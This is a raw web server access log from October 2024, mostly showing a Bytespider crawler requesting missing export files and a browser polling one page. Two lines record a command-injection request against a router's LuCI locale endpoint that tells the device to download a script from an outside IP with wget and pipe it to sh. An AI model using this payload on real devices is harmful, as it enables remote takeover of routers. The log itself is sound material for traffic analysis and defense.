156.59.198.135 - - [18/Oct/2024:13:53:28 +0200] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20171211112500.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:13:53:49 +0200] "GET /renault.activities.at/htdocs/log/cron/importLogisticData_3115352.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:13:53:54 +0200] "GET /entry.php?id=10271&&ser=252374 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=252313" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:13:53:54 +0200] "GET /gui/javascript/form_form.js?1729252434 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=252374" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:13:54:10 +0200] "GET /renault.activities.at/htdocs/log/cron/autologout_3115845.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:13:54:31 +0200] "GET /renault.activities.at/htdocs/log/cron/importLogisticData_3115804.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:13:54:52 +0200] "GET /renault.activities.at/htdocs/log/cron/importLogisticData_3114957.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:13:54:54 +0200] "GET /entry.php?id=10271&&ser=252434 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=252374" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:13:54:54 +0200] "GET /gui/javascript/form_form.js?1729252494 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=252434" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:13:55:13 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001291803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:13:55:35 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11354028.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:13:55:54 +0200] "GET /entry.php?id=10271&&ser=252494 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=252434" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:13:55:54 +0200] "GET /gui/javascript/form_form.js?1729252554 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=252494" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:13:55:56 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910101403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:13:56:18 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10839744.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:13:56:39 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105071003_RenOrder.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:13:57:00 +0200] "GET /entry.php?id=10271&&ser=252554 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=252494" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:13:57:00 +0200] "GET /gui/javascript/form_form.js?1729252620 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=252554" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:13:57:00 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12490478.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:13:57:21 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109161503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:13:57:43 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11898893.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:13:58:00 +0200] "GET /entry.php?id=10271&&ser=252620 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=252554" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:13:58:00 +0200] "GET /gui/javascript/form_form.js?1729252680 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=252620" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:13:58:04 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115483.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:13:58:25 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111230803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:13:58:46 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12383137.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:13:59:00 +0200] "GET /entry.php?id=10271&&ser=252680 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=252620" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:13:59:01 +0200] "GET /gui/javascript/form_form.js?1729252741 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=252680" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:13:59:07 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11333381.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:13:59:28 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12103396.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:13:59:50 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12467019.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:00:01 +0200] "GET /entry.php?id=10271&&ser=252741 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=252680" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:00:01 +0200] "GET /gui/javascript/form_form.js?1729252801 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=252741" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:14:00:11 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11035146.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:00:32 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3116561.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:00:53 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12043847.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:01:01 +0200] "GET /entry.php?id=10271&&ser=252801 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=252741" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:01:01 +0200] "GET /gui/javascript/form_form.js?1729252861 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=252801" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:14:01:14 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009281603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:01:35 +0200] "GET /renault.activities.at/htdocs/export/xml/data/articles/202005120903_RenArticle.xml HTTP/1.0" 404 331 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:01:57 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11772900.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:02:01 +0200] "GET /entry.php?id=10271&&ser=252861 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=252801" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:02:02 +0200] "GET /gui/javascript/form_form.js?1729252921 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=252861" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:14:02:17 +0200] "GET /renault.activities.at/htdocs/export/xml/data/articles/201909231203_RenArticle.xml HTTP/1.0" 404 331 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:14:02:39 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10790221.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:14:02:59 +0200] "GET /default/cgi-bin/lang/tooltips_f/awstats-tt-it.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:03:02 +0200] "GET /entry.php?id=10271&&ser=252921 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=252861" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:03:02 +0200] "GET /gui/javascript/form_form.js?1729252982 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=252921" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:14:03:21 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908071803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:14:03:42 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11076831.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:04:02 +0200] "GET /entry.php?id=10271&&ser=252982 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=252921" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:04:02 +0200] "GET /gui/javascript/form_form.js?1729253042 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=252982" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:14:04:04 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12067852.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:04:25 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908301603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:14:04:46 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106181403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:05:02 +0200] "GET /entry.php?id=10271&&ser=253042 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=252982" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:05:02 +0200] "GET /gui/javascript/form_form.js?1729253102 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253042" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:14:05:07 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109290903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:05:28 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11995306.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:14:05:49 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115851.txt HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:06:03 +0200] "GET /entry.php?id=10271&&ser=253102 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=253042" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:06:03 +0200] "GET /gui/javascript/form_form.js?1729253163 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253102" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:14:06:10 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115307.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:14:06:32 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11054451.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:06:52 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115634.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:07:03 +0200] "GET /entry.php?id=10271&&ser=253163 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=253102" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:07:03 +0200] "GET /gui/javascript/form_form.js?1729253223 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253163" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:14:07:14 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110111503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:07:34 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11628946.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:07:56 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005191503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:08:03 +0200] "GET /entry.php?id=10271&&ser=253223 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=253163" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:08:03 +0200] "GET /gui/javascript/form_form.js?1729253283 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253223" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:14:08:17 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115244.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:08:38 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115662.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:09:00 +0200] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-tw.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:09:03 +0200] "GET /entry.php?id=10271&&ser=253283 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=253223" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:09:04 +0200] "GET /gui/javascript/form_form.js?1729253344 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253283" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:14:09:21 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11867999.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:09:42 +0200] "GET /renault.activities.at/htdocs/export/txt/factura/FacturaExport20141216111857.txt HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:10:03 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201907191003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:10:04 +0200] "GET /entry.php?id=10271&&ser=253344 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=253283" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:10:04 +0200] "GET /gui/javascript/form_form.js?1729253404 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253344" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:14:10:24 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103121003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:10:46 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12243382.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.128.67 - - [18/Oct/2024:14:10:49 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
178.165.176.165 - - [18/Oct/2024:14:11:04 +0200] "GET /entry.php?id=10271&&ser=253404 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=253344" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:11:04 +0200] "GET /gui/javascript/form_form.js?1729253464 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253404" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:14:11:07 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908141603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:11:27 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107281703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.128.67 - - [18/Oct/2024:14:11:31 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.136 - - [18/Oct/2024:14:11:49 +0200] "GET /renault.activities.at/htdocs/log/cron/autologout_3115409.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:12:04 +0200] "GET /entry.php?id=10271&&ser=253464 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=253404" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
